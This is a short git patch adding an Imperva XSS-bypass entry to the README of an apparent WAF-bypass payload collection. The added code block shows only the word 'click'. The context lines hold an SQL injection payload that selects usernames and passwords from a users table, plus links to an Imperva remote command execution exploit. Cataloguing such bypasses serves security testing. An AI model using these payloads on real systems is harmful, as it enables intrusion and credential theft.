From 3ce797c5a401464be594c1083b616793755cf630 Mon Sep 17 00:00:00 2001 From: Pinaki Mondal Date: Sun, 27 Oct 2019 11:10:01 +0530 Subject: [PATCH] Added another xss bypass for imperva --- README.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/README.md b/README.md index c5d0529..f868e9e 100644 --- a/README.md +++ b/README.md @@ -3598,6 +3598,10 @@ amUserId=1 union select username,password,3,4 from users ``` ### Imperva +- XSS Bypass by [@0xInfection](https://twitter.com/0xInfection) +``` +click +``` - [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396) - XSS Bypass by [@David Y](https://twitter.com/daveysec) ```